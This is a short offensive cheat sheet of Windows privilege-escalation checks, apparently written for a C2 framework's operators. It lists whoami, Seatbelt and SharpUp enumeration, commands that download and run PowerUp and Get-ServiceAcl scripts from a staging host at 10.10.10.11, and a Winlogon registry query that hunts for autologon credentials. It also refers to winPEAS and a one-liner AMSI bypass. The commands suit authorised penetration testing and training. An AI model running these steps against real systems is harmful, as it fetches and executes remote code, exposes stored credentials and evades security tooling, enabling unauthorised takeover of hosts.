PrivEsc Checks
1) Check privs - using BOF or with execute
sa-whoami
execute -o whoami /all2) Enumerate Permissions
seatbelt -- -group=all
seatbelt -- -group=user3) Run SharpUp to audit
sharpup -- audit
sharpup -i -- audit4) Run PowerUp
sharpsh -t 40 -- '-u http://10.10.10.11/powershell-scripts/PowerUp.ps1 -c "Invoke-AllChecks"'5) # We can modify a service, check Get-ServiceAcl what we can modify/create
sharpsh -t 20 -- '-u http://10.10.10.11/powershell-scripts/Get-ServiceAcl.ps1 -c "Get-ServiceAcl -Name SNMPTRAP | select -expand Access"'6) Check Registry for autologon
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"7) HostRecon
8) Footholder-V3.ps1
9) winPEAS - 400 secs wait - better to do interactively
10) Winpeas - With oneliner AMSI bypass
11) Load within powershell itself (when required)
Last updated